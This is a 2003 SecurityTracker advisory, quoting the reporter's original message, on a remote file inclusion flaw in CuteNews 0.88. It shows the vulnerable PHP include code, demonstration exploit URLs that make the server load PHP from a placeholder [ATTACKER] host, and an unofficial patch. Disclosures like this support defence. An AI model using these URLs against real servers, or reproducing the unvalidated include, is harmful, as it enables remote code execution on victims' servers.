CuteNews Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Server
|
|
SecurityTracker Alert ID: 1006173 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 26 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.88
|
Description: An include file vulnerability was reported in CuteNews. A remote user can execute arbitrary PHP code and operating system commands on the target server.
It is reported that several scripts include files without validating the location of the included file. A remote user can create
a URL that specifies a remote location for the 'config.php' and 'news.txt' include files to cause the remotely located file to be
executed by the target server.
The 'shownews.php', 'search.php', and 'comments.php' scripts are reportedly vulnerable.
Some
demonstration exploit URLs are provided:
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTAC
KER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
The remote user can insert arbitrary PHP code into the
following files so that, when the above listed URLs are invoked, the arbitrary PHP code will be executed:
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
T
he PHP code can include operating system commands and will be executed with the privileges of the target web server.
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target server.
|
Solution: No solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message.
|
Vendor URL: air.langame.net/cutenews/index.php (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Over_G" <overg@mail.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 25 Feb 2003 14:31:55 +0300
From: "Over_G" <overg@mail.ru>
Subject: PHP code injection in CuteNews
|
PHP source code injection in CuteNews
Informations :
===============================================
Script : CuteNews v0.88
Offical site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :
if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :
require_once("$cutepath/config.php");
===============================================
comments.php :
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
Content config.php or news.txt:
Any PHP Code.
===============================================
Patch :
Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
on $cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG@mail.ru VenoM88@mail.ru
|
|
